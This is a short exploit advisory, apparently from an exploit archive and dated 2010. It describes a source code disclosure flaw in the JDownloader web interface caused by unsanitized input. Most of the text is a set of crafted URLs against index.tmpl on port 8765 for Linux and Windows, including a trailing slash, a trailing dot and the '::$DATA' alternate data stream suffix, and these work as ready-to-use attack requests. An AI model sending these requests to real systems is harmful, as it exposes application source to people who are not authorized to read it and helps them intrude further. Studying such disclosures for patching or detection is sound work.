18 lines
No EOL
498 B
Text
18 lines
No EOL
498 B
Text
# Exploit Title: JDownloader Webinterface Source Code Disclosure
|
|
# Date: 11/24/10
|
|
# Author: Sil3nt_Dre4m
|
|
# Software Link: http://jdownloader.org
|
|
# Version: Latest (0.9.850)
|
|
# Tested on: Windows, Linux
|
|
|
|
JDownloader WebInterface is vulnerable to a source code disclosure exploit to due not properly sanitizing user input.
|
|
|
|
Linux:
|
|
|
|
http://127.0.0.1:8765/index.tmpl/
|
|
|
|
Windows:
|
|
|
|
http://127.0.0.1:8765/index.tmpl.
|
|
http://127.0.0.1:8765/index.tmpl::$DATA
|
|
http://127.0.0.1:8765/index.tmpl/ |